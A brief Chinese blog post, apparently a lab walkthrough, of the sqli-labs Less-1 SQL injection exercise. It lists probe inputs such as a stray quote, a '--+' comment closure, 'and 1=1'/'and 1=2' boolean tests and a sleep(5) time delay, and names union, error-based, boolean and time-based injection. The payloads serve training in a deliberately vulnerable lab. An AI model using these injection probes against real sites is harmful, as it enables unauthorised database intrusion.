sqli-labs less-1

id=1

sqli-labs less-1

 id=2,前后两者不同,存在联合查询

sqli-labs less-1

 id=2',存在报错注入

sqli-labs less-1

id=2' --+ ('闭合掉前面的单引号,--+注释掉后面的内容)

sqli-labs less-1

 id=2' and 1=1 --+

sqli-labs less-1

 id=2' and 1=2 --+ 存在布尔类型注入

sqli-labs less-1

 id=2' and sleep(5) --+,有等待时间。所以存在延时注入

sqli-labs less-1

 

上一篇:sqli-labs靶场Less-12


下一篇:漏洞复现篇——二次渲染绕过(upload-labs---16关)